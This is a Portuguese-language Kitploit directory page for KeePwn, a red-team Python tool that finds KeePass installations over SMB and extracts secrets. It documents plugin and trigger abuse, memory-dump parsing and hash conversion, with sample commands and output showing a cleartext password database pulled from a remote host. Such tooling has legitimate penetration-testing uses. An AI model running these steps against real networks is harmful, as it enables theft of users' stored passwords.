Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
KeePwn — Uma ferramenta Python para automatizar a descoberta e extração de segredos do KeePass. | Kitploit
Ferramentas/GitHubGitHub/orange-cyberdefense/keepwn
Quebra de SenhasExploraçãoPós-ExploraçãoRed Teaming
GitHuborange-cyberdefense/keepwn

KeePwn

Uma ferramenta Python para automatizar a descoberta e extração de segredos do KeePass.

Ver Repositório
5275414há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Um script Python para ajudar red teamers a descobrir instâncias do KeePass e extrair segredos.

Funcionalidades

  • Descoberta do KeePass
    • Procurar arquivos de instalação do KeePass através do compartilhamento SMB C$.
    • Aceitar múltiplas fontes de destino (IP, CIDR, hostname, arquivo).
    • Verificar metadados do KeePass (versão, último acesso).
    • Verificar processo KeePass em execução via RPC baseado em Impacket.
    • Implementação multi-thread para evitar hosts gargalo.
    • Exportar resultados da pesquisa para CSV.
    • Encontrar bancos de dados KDBX.
  • Abuso de Plugins do KeePass
    • Adicionar e remover plugins do KeePass (veja KeeFarce Reborn) através do compartilhamento SMB C$.
    • Recuperar exportações em texto claro no host remoto.
  • Abuso de Triggers do KeePass
    • Adicionar e remover triggers (veja: KeeThief) do arquivo de configuração do KeePass através do compartilhamento SMB C$.
    • Recuperar exportações em texto claro no host remoto.
    • Personalizar triggers com argumentos de linha de comando.
  • Análise de Dumps de Memória do KeePass
    • Analisar dumps de memória para encontrar candidatos à senha mestra (CVE-2023-32784).
    • Analisar dumps de memória para encontrar chave de criptografia.
  • Quebra de Banco de Dados KeePass
    • Converter KDBX para formatos compatíveis com John e Hashcat.
    • Adicionar suporte ao formato KDBX 4.x.
  • Autenticação
    • Suporte à autenticação por hash LM/NT.
    • Suporte à autenticação Kerberos.
  • Diversos
    • Escrever testes unitários.
    • Disponibilizar o projeto no PyPI .

Instalação

git clone https://github.com/Orange-Cyberdefense/KeePwn && cd KeePwn
python3 -m pip install .
KeePwn --help

Ou se não quiser instalar, apenas executar em um virtualenv:

git clone https://github.com/Orange-Cyberdefense/KeePwn && cd KeePwn
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install -r requirements.txt
python3 KeePwn.py --help

Uso

Descoberta

O módulo search do KeePwn é usado para identificar hosts que executam o KeePass no seu ambiente alvo:

$ python3 KeePwn.py search -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -tf ./targets.txt

[*] Iniciando pesquisa remota de KeePass com 5 threads

[PC01.COMPANY.LOCAL] Nenhum arquivo relacionado ao KeePass encontrado
[PC02.COMPANY.LOCAL] Nenhum arquivo relacionado ao KeePass encontrado
[PC03.COMPANY.LOCAL] Encontrado '\\C$\Program Files\KeePass Password Safe 2\KeePass.exe' (Versão: 2.57.1, ÚltimaVerificaçãoDeAtualização: há 48 minutos)
[PC03.COMPANY.LOCAL] Encontrado '\\C$\Users\jdoe\AppData\Roaming\KeePass\KeePass.config.xml'
[PC04.COMPANY.LOCAL] Nenhum arquivo relacionado ao KeePass encontrado
[PC05.COMPANY.LOCAL] Nenhum arquivo relacionado ao KeePass encontrado

Ele utiliza o compartilhamento C$ integrado do Active Directory para procurar arquivos relacionados ao KeePass em locais padrão, exigindo, portanto, privilégios de administrador nos alvos.

O módulo primeiro procurará pelo arquivo de configuração KeePass.config.xml na pasta %APPDATA%\KeePass de cada usuário, bem como KeePass.exe no seu caminho de instalação padrão (C:\Program Files\KeePass Password Safe 2). Se um arquivo de configuração for encontrado, mas o KeePass não estiver instalado globalmente, o KeePwn procurará por instalações portáteis até --max-depth subpastas.

Esta técnica básica de busca deve ser suficiente para determinar com precisão se o KeePass é usado em uma estação de trabalho ou não. Além disso, a opção --get-process usará a implementação RPC do Impacket para determinar se o KeePass está atualmente em execução no alvo.

Também estão incluídas várias opções de qualidade de vida para exportar os resultados da pesquisa para um arquivo CSV, exibir apenas alvos onde o KeePass foi encontrado e ajustar o número de threads paralelas:

$ KeePwn search -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -tf ./targets.txt --threads 4 --get-process --found-only --output keepwn_out.csv

[*] Iniciando pesquisa remota de KeePass com 4 threads

[PC03.COMPANY.LOCAL] Encontrado '\\C$\Program Files\KeePass Password Safe 2\KeePass.exe' (Versão: 2.57.1, ÚltimaVerificaçãoDeAtualização: há 48 minutos)
[PC03.COMPANY.LOCAL] Encontrado '\\C$\Users\jdoe\AppData\Roaming\KeePass\KeePass.config.xml'
[PC03.COMPANY.LOCAL] Encontrado processo KeePass.exe em execução (Usuário: COMPANY\jdoe, PID: 3820)

[+] Resultados da pesquisa registrados em keepwn_out.csv
Abuso de Plugins

O KeePass possui um framework de plugins que pode ser abusado para carregar DLLs maliciosas no processo do KeePass, permitindo que atacantes com direitos de administrador exportem facilmente o banco de dados (veja: KeeFarceRebornPlugin).

O módulo plugin do KeePwn permite:

  • Listar plugins atualmente instalados e enumerar o cache de plugins

    $ KeePwn plugin check -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL                                   
    
    [*] Nenhum caminho especificado, procurando em locais padrão..
    [*] Encontrado dbBackup.plgx na pasta '\\C$\Program Files\KeePass Password Safe 2\Plugins\'
    [*] Encontrado pDhkzWQYiobXhtBEEnbo na pasta '\\C$\Users\jdoe\AppData\Local\KeePass\PluginCache'
    
  • Adicionar e remover seus plugins maliciosos

    $ KeePwn plugin add -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL --plugin KeeFarceRebornPlugin.dll  
    
    [*] Nenhum caminho especificado, procurando em locais padrão..
    [*] Encontrado diretório de Plugins do KeePass '\\C$\Program Files\KeePass Password Safe 2\Plugins\'
    [!] Prestes a adicionar KeeFarceRebornPlugin.dll ao diretório de Plugins do KeePass, deseja continuar? [s/n]
    > s
    [+] Plugin adicionado com sucesso ao KeePass, aguarde a próxima reinicialização, faça polling e aproveite!
    
  • Fazer polling de %APPDATA% para exportações e movê-las automaticamente do host remoto para o sistema de arquivos local

    $ KeePwn plugin poll -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL                                  
    
    [*] Fazendo polling pela exportação do banco de dados a cada 5 segundos.. pressione CTRL+C para abortar. CONCLUÍDO                                                                                                                                                                                
    [+] Encontrada exportação em texto claro '\\C$\\Users\jdoe\AppData\Roaming\export.xml'
    [+] Exportação remota movida para ./export.xml
    

Estas ações são realizadas através do acesso ao compartilhamento SMB C$, limitando a detecção por AV/EDR, pois nenhuma execução de comando é realizada.

Abuso de Triggers

Conforme descrito no blog post de @harmj0y (e posteriormente CVE-2023-24055), o sistema de triggers do KeePass pode ser abusado para exportar o banco de dados em texto claro.

O módulo trigger do KeePwn permite:

  • Verificar se um trigger malicioso chamado "export" está atualmente escrito na configuração do KeePass

    $ KeePwn trigger check -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL
    
Baixar ferramenta